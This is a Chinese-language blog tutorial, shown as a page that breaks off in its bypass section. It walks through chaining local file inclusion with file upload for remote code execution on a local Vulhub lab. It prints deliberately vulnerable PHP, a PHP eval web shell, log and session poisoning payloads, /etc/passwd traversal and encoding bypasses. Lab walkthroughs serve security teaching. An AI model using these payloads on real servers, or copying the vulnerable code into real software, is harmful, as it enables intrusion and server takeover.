

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="bae">
  <meta name="keywords" content="">
  
    <meta name="description" content="本地文件包含（LFI）与文件上传漏洞联动实现 RCE 详解一、前言本地文件包含（LFI）和文件上传漏洞是 Web 安全领域常见的高危漏洞，当两者结合时，可通过上传恶意文件并利用 LFI 包含执行，轻松实现远程命令执行（RCE），导致服务器完全失控。本文基于 Vulhub 靶场，详细复现 LFI 与文件上传漏洞的联动攻击，涵盖原理分析、利用方式、绕过技巧及防护措施，旨在帮助安全从业者深入理解漏洞成因">
<meta property="og:type" content="article">
<meta property="og:title" content="本地文件包含（LFI）与文件上传漏洞联动实现 RCE">
<meta property="og:url" content="https://bae-ace.github.io/2025/08/06/%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%EF%BC%88LFI%EF%BC%89%E4%B8%8E%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E8%81%94%E5%8A%A8%E5%AE%9E%E7%8E%B0-RCE/index.html">
<meta property="og:site_name" content="bae的博客">
<meta property="og:description" content="本地文件包含（LFI）与文件上传漏洞联动实现 RCE 详解一、前言本地文件包含（LFI）和文件上传漏洞是 Web 安全领域常见的高危漏洞，当两者结合时，可通过上传恶意文件并利用 LFI 包含执行，轻松实现远程命令执行（RCE），导致服务器完全失控。本文基于 Vulhub 靶场，详细复现 LFI 与文件上传漏洞的联动攻击，涵盖原理分析、利用方式、绕过技巧及防护措施，旨在帮助安全从业者深入理解漏洞成因">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://bae-ace.github.io/img/lfi-file-upload-rce-cover.jpg">
<meta property="article:published_time" content="2025-08-06T13:43:58.000Z">
<meta property="article:modified_time" content="2025-08-06T13:54:57.127Z">
<meta property="article:author" content="bae">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="Vulhub">
<meta property="article:tag" content="RCE">
<meta property="article:tag" content="蚁剑">
<meta property="article:tag" content="文件上传">
<meta property="article:tag" content="LFI">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://bae-ace.github.io/img/lfi-file-upload-rce-cover.jpg">
  
  
  
  <title>本地文件包含（LFI）与文件上传漏洞联动实现 RCE - bae的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"bae-ace.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":60,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":"CHbSLmwKFof8sHkOvlnoDfza-MdYXbMMI","app_key":"lVqIfnWUAiZZLIag2RoSpxoo","server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2025-07-19T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>bae&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-books"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item dropdown">
              <a class="nav-link dropdown-toggle" target="_self" href="javascript:;" role="button"
                 data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                <i class="iconfont icon-book"></i>
                <span>文档</span>
              </a>
              <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/" target="_self">
                    
                    <span>主题博客</span>
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/docs/guide/" target="_self">
                    
                    <span>配置指南</span>
                  </a>
                
                  
                  
                  
                  <a class="dropdown-item" href="https://hexo.fluid-dev.com/docs/icon/" target="_self">
                    
                    <span>图标用法</span>
                  </a>
                
              </div>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/AI%E9%A3%8E%E6%99%AF.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="本地文件包含（LFI）与文件上传漏洞联动实现 RCE"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        bae
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-08-06 21:43" pubdate>
           2025 年 08 月 06 日 , 晚上 09:43 , 星期三
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          <!-- compatible with older versions-->
          2.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          18 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span>次
        </span>
        
      
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">本地文件包含（LFI）与文件上传漏洞联动实现 RCE</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="本地文件包含（LFI）与文件上传漏洞联动实现-RCE-详解"><a href="#本地文件包含（LFI）与文件上传漏洞联动实现-RCE-详解" class="headerlink" title="本地文件包含（LFI）与文件上传漏洞联动实现 RCE 详解"></a>本地文件包含（LFI）与文件上传漏洞联动实现 RCE 详解</h1><h2 id="一、前言"><a href="#一、前言" class="headerlink" title="一、前言"></a>一、前言</h2><p><strong>本地文件包含（LFI）<strong>和</strong>文件上传漏洞</strong>是 Web 安全领域常见的高危漏洞，当两者结合时，可通过上传恶意文件并利用 LFI 包含执行，轻松实现<strong>远程命令执行（RCE）</strong>，导致服务器完全失控。本文基于 <strong>Vulhub</strong> 靶场，详细复现 LFI 与文件上传漏洞的联动攻击，涵盖原理分析、利用方式、绕过技巧及防护措施，旨在帮助安全从业者深入理解漏洞成因与防范方法。</p>
<p><strong>学习目标</strong>：</p>
<ul>
<li>掌握 LFI 和文件上传漏洞的原理</li>
<li>学会通过上传+包含实现 RCE 的攻击链</li>
<li>理解日志注入、Session 注入等进阶利用方式</li>
<li>掌握防御 LFI 和文件上传漏洞的最佳实践</li>
</ul>
<blockquote>
<p><strong>免责声明</strong>：本文内容仅限合法授权的渗透测试和安全研究，严禁用于非法攻击！</p>
</blockquote>
<hr>
<h2 id="二、漏洞原理简述"><a href="#二、漏洞原理简述" class="headerlink" title="二、漏洞原理简述"></a>二、漏洞原理简述</h2><h3 id="1-本地文件包含（LFI）"><a href="#1-本地文件包含（LFI）" class="headerlink" title="1. 本地文件包含（LFI）"></a>1. 本地文件包含（LFI）</h3><p>LFI 漏洞因 Web 应用动态包含文件时未严格校验用户输入而产生。例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">include</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>]); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>攻击者可通过 URL 参数控制包含的文件路径，访问本地敏感文件：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>example.com<span class="hljs-regexp">/index.php?page=../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/etc/</span>passwd<br></code></pre></td></tr></table></figure>

<p><strong>危害</strong>：</p>
<ul>
<li>读取敏感文件（如 <code>/etc/passwd</code>、配置文件）</li>
<li>配合其他漏洞（如文件上传）实现 RCE</li>
</ul>
<h3 id="2-文件上传漏洞"><a href="#2-文件上传漏洞" class="headerlink" title="2. 文件上传漏洞"></a>2. 文件上传漏洞</h3><p>文件上传漏洞因 Web 应用未严格校验上传文件的类型、内容或存储路径而产生。攻击者可上传：</p>
<ul>
<li>恶意脚本（如 PHP WebShell）</li>
<li>伪装文件（如 <code>shell.jpg</code> 包含 PHP 代码）</li>
<li>日志文件或 Session 文件（注入恶意代码）</li>
</ul>
<p><strong>危害</strong>：</p>
<ul>
<li>直接执行恶意脚本</li>
<li>配合 LFI 触发 RCE</li>
</ul>
<h3 id="3-LFI-文件上传-RCE"><a href="#3-LFI-文件上传-RCE" class="headerlink" title="3. LFI + 文件上传 &#x3D; RCE"></a>3. LFI + 文件上传 &#x3D; RCE</h3><p>当 Web 应用同时存在 LFI 和文件上传漏洞时，攻击者可：</p>
<ol>
<li>上传包含 PHP 代码的文件（如 <code>shell.txt</code>）</li>
<li>通过 LFI 包含该文件（如 <code>page=uploads/shell.txt</code>）</li>
<li>PHP 解析器执行文件中的代码，实现 RCE</li>
</ol>
<p><strong>攻击链</strong>：</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xl">上传恶意文件（如 <span class="hljs-function"><span class="hljs-title">shell</span>.txt） -&gt;</span> LFI 包含（如 /<span class="hljs-function"><span class="hljs-title">uploads</span>/shell.txt） -&gt;</span> PHP 执行代码 -&gt; RCE<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="三、靶场环境搭建"><a href="#三、靶场环境搭建" class="headerlink" title="三、靶场环境搭建"></a>三、靶场环境搭建</h2><h3 id="1-环境信息"><a href="#1-环境信息" class="headerlink" title="1. 环境信息"></a>1. 环境信息</h3><ul>
<li><strong>操作系统</strong>：Kali Linux（虚拟机，推荐 4GB 内存，2 核 CPU）</li>
<li><strong>靶场</strong>：Vulhub 或手动搭建 PHP 环境</li>
<li><strong>工具</strong>：<ul>
<li>Burp Suite（抓包与请求修改）</li>
<li>蚁剑（WebShell 管理）</li>
<li>Curl（命令执行测试）</li>
</ul>
</li>
<li><strong>靶站地址</strong>：<code>http://localhost:8080</code></li>
</ul>
<h3 id="2-手动搭建靶场"><a href="#2-手动搭建靶场" class="headerlink" title="2. 手动搭建靶场"></a>2. 手动搭建靶场</h3><ol>
<li><p><strong>安装 Nginx 和 PHP</strong>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> apt update<br><span class="hljs-built_in">sudo</span> apt install nginx php-fpm php<br></code></pre></td></tr></table></figure></li>
<li><p><strong>创建 LFI 文件</strong>（<code>/var/www/html/index.php</code>）：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$page</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>] ?? <span class="hljs-string">&#x27;default.php&#x27;</span>;<br><span class="hljs-keyword">include</span>(<span class="hljs-variable">$page</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li><p><strong>创建上传脚本</strong>（<code>/var/www/html/upload.php</code>）：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>])) &#123;<br>    <span class="hljs-title function_ invoke__">move_uploaded_file</span>(<span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;tmp_name&#x27;</span>], <span class="hljs-string">&#x27;Uploads/&#x27;</span> . <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>]);<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;上传成功：Uploads/&quot;</span> . <span class="hljs-variable">$_FILES</span>[<span class="hljs-string">&#x27;file&#x27;</span>][<span class="hljs-string">&#x27;name&#x27;</span>];<br>&#125;<br><span class="hljs-meta">?&gt;</span><br>&lt;form method=<span class="hljs-string">&quot;post&quot;</span> enctype=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;<br>    &lt;input type=<span class="hljs-string">&quot;file&quot;</span> name=<span class="hljs-string">&quot;file&quot;</span>&gt;<br>    &lt;input type=<span class="hljs-string">&quot;submit&quot;</span>&gt;<br>&lt;/form&gt;<br></code></pre></td></tr></table></figure></li>
<li><p><strong>配置目录权限</strong>：</p>
<ul>
<li>创建 <code>/var/www/html/Uploads/</code> 目录：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">mkdir</span> /var/www/html/Uploads<br><span class="hljs-built_in">chmod</span> -R 775 /var/www/html/Uploads<br></code></pre></td></tr></table></figure></li>
<li>确保 Nginx 和 PHP-FPM 有读写权限。</li>
</ul>
</li>
<li><p><strong>启动服务</strong>：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> service nginx start<br><span class="hljs-built_in">sudo</span> service php7.4-fpm start<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="3-使用-Vulhub"><a href="#3-使用-Vulhub" class="headerlink" title="3. 使用 Vulhub"></a>3. 使用 Vulhub</h3><ul>
<li><strong>克隆 Vulhub</strong>：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/vulhub/vulhub.git<br><span class="hljs-built_in">cd</span> vulhub/php/php-lfi<br></code></pre></td></tr></table></figure></li>
<li><strong>启动靶场</strong>：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> docker-compose up -d<br></code></pre></td></tr></table></figure></li>
<li><strong>验证</strong>：<ul>
<li>访问 <code>http://localhost:8080</code>，确认 PHP 环境运行正常。</li>
</ul>
</li>
</ul>
<hr>
<h2 id="四、漏洞利用方式详解"><a href="#四、漏洞利用方式详解" class="headerlink" title="四、漏洞利用方式详解"></a>四、漏洞利用方式详解</h2><h3 id="1-方式一：上传可控-PHP-内容的文本文件"><a href="#1-方式一：上传可控-PHP-内容的文本文件" class="headerlink" title="1. 方式一：上传可控 PHP 内容的文本文件"></a>1. 方式一：上传可控 PHP 内容的文本文件</h3><h4 id="步骤"><a href="#步骤" class="headerlink" title="步骤"></a>步骤</h4><ol>
<li><strong>准备 WebShell</strong>：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;&lt;?php @eval(\$_POST[&#x27;cmd&#x27;]); ?&gt;&quot;</span> &gt; shell.txt<br></code></pre></td></tr></table></figure></li>
<li><strong>上传文件</strong>：<ul>
<li>访问 <code>http://localhost:8080/upload.php</code>。</li>
<li>使用 Burp Suite 拦截上传请求：<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/upload.php</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>localhost:8080<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>multipart/form-data; boundary=----WebKitFormBoundary<br><br><span class="language-php">------WebKitFormBoundary</span><br><span class="language-php">Content-Disposition: form-data; name=<span class="hljs-string">&quot;file&quot;</span>; filename=<span class="hljs-string">&quot;shell.txt&quot;</span></span><br><span class="language-php">Content-Type: text/plain</span><br><span class="language-php"></span><br><span class="language-php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]); <span class="hljs-meta">?&gt;</span></span><br><span class="language-php">------WebKitFormBoundary--</span><br></code></pre></td></tr></table></figure></li>
<li>上传后，文件存储在 <code>/Uploads/shell.txt</code>。</li>
</ul>
</li>
<li><strong>触发 LFI</strong>：<ul>
<li>访问：<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sas">http://localhost:8080/<span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">page</span>=Uploads/shell.txt<span class="hljs-variable">&amp;cmd</span>=<span class="hljs-meta">system</span>(<span class="hljs-string">&#x27;id&#x27;</span>);<br></code></pre></td></tr></table></figure></li>
<li><strong>结果</strong>：返回命令执行结果，如：<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-attribute">uid</span>=33(www-data) <span class="hljs-attribute">gid</span>=33(www-data)<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
</ol>
<h4 id="为什么能执行？"><a href="#为什么能执行？" class="headerlink" title="为什么能执行？"></a>为什么能执行？</h4><ul>
<li><code>include(&#39;Uploads/shell.txt&#39;)</code> 将 <code>.txt</code> 文件作为 PHP 脚本解析。</li>
<li>文件中的 <code>&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;</code> 被执行，实现 RCE。</li>
</ul>
<h4 id="连接蚁剑"><a href="#连接蚁剑" class="headerlink" title="连接蚁剑"></a>连接蚁剑</h4><ul>
<li><strong>配置</strong>：<ul>
<li><strong>URL</strong>：<code>http://localhost:8080/index.php?page=Uploads/shell.txt</code></li>
<li><strong>密码</strong>：<code>cmd</code></li>
<li><strong>类型</strong>：PHP</li>
</ul>
</li>
<li><strong>功能</strong>：命令执行、文件管理、反弹 Shell。</li>
</ul>
<h3 id="2-方式二：Web-日志注入-LFI"><a href="#2-方式二：Web-日志注入-LFI" class="headerlink" title="2. 方式二：Web 日志注入 + LFI"></a>2. 方式二：Web 日志注入 + LFI</h3><h4 id="步骤-1"><a href="#步骤-1" class="headerlink" title="步骤"></a>步骤</h4><ol>
<li><strong>注入恶意 User-Agent</strong>：<ul>
<li>使用 Burp Suite 发送请求：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">GET / HTTP/<span class="hljs-number">1.1</span><br>Host: localhost:<span class="hljs-number">8080</span><br>User-Agent: <span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>Nginx 日志（<code>/var/log/nginx/access.log</code>）记录：<figure class="highlight verilog"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs verilog"><span class="hljs-string">&quot;&lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt;&quot;</span> - -<br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><strong>包含日志文件</strong>：<ul>
<li>访问：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://localhost:8080/index.php?page=/var/log/nginx/access.log&amp;cmd=<span class="hljs-built_in">whoami</span><br></code></pre></td></tr></table></figure></li>
<li><strong>结果</strong>：返回 <code>www-data</code>。</li>
</ul>
</li>
</ol>
<h4 id="适用场景"><a href="#适用场景" class="headerlink" title="适用场景"></a>适用场景</h4><ul>
<li>WAF 未过滤 User-Agent。</li>
<li>日志文件路径可访问（如未配置 <code>open_basedir</code>）。</li>
</ul>
<h3 id="3-方式三：Session-文件包含"><a href="#3-方式三：Session-文件包含" class="headerlink" title="3. 方式三：Session 文件包含"></a>3. 方式三：Session 文件包含</h3><h4 id="步骤-2"><a href="#步骤-2" class="headerlink" title="步骤"></a>步骤</h4><ol>
<li><strong>注入 Session</strong>：<ul>
<li>创建脚本 <code>session.php</code>：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;payload&#x27;</span>] = <span class="hljs-string">&#x27;&lt;?php system($_GET[&quot;cmd&quot;]); ?&gt;&#x27;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>访问 <code>http://localhost:8080/session.php</code> 生成 Session 文件。</li>
</ul>
</li>
<li><strong>查找 Session 文件</strong>：<ul>
<li>默认路径：<code>/var/lib/php/sessions/sess_&lt;session_id&gt;</code>。</li>
<li>使用 Burp 或 Curl 获取 Session ID：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl -I http://localhost:8080/session.php<br></code></pre></td></tr></table></figure>
输出：<code>Set-Cookie: PHPSESSID=abcxyz;</code></li>
</ul>
</li>
<li><strong>包含 Session 文件</strong>：<ul>
<li>访问：<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">http:<span class="hljs-regexp">//</span>localhost:<span class="hljs-number">8080</span><span class="hljs-regexp">/index.php?page=/</span>var<span class="hljs-regexp">/lib/</span>php<span class="hljs-regexp">/sessions/</span>sess_abcxyz&amp;cmd=whoami<br></code></pre></td></tr></table></figure></li>
<li><strong>结果</strong>：返回 <code>www-data</code>。</li>
</ul>
</li>
</ol>
<h4 id="适用场景-1"><a href="#适用场景-1" class="headerlink" title="适用场景"></a>适用场景</h4><ul>
<li>应用使用 PHP Session。</li>
<li>Session 文件路径可预测且可包含。</li>
</ul>
<h3 id="4-方式四：Proc-self-environ-包含"><a href="#4-方式四：Proc-self-environ-包含" class="headerlink" title="4. 方式四：Proc&#x2F;self&#x2F;environ 包含"></a>4. 方式四：Proc&#x2F;self&#x2F;environ 包含</h3><h4 id="步骤-3"><a href="#步骤-3" class="headerlink" title="步骤"></a>步骤</h4><ol>
<li><strong>注入环境变量</strong>：<ul>
<li>发送请求：<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php">GET / HTTP/<span class="hljs-number">1.1</span><br>Host: localhost:<span class="hljs-number">8080</span><br>User-Agent: <span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;cmd&#x27;</span>]); <span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure></li>
<li>注入到 <code>/proc/self/environ</code>。</li>
</ul>
</li>
<li><strong>包含文件</strong>：<ul>
<li>访问：<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">http://localhost:8080/index.php?page=/proc/self/environ&amp;cmd=<span class="hljs-built_in">id</span><br></code></pre></td></tr></table></figure></li>
<li><strong>结果</strong>：返回命令执行结果。</li>
</ul>
</li>
</ol>
<h4 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h4><ul>
<li>需 <code>/proc/self/environ</code> 可读。</li>
<li>常用于 Linux 系统。</li>
</ul>
<hr>
<h2 id="五、绕过技巧"><a href="#五、绕过技巧" class="headerlink" title="五、绕过技巧"></a>五、绕过技巧</h2><h3 id="1-编码绕过"><a href="#1-编码绕过" class="headerlink" title="1. 编码绕过"></a>1. 编码绕过</h3><ul>
<li><strong>URL 编码</strong>：<ul>
<li><code>/etc/passwd</code> -&gt; <code>%2fetc%2fpasswd</code></li>
<li><code>../</code> -&gt; <code>..%2f</code></li>
</ul>
</li>
<li><strong>双编码</strong>：<ul>
<li><code>%2e%2e%2f</code> 绕过部分 WAF。</li>
</ul>
</li>
</ul>
<h3 id="2-伪装文件后缀"><a href="#2-伪装文件后缀" class="headerlink" title="2. 伪装文件后缀"></a>2. 伪装文件后缀</h3><ul>
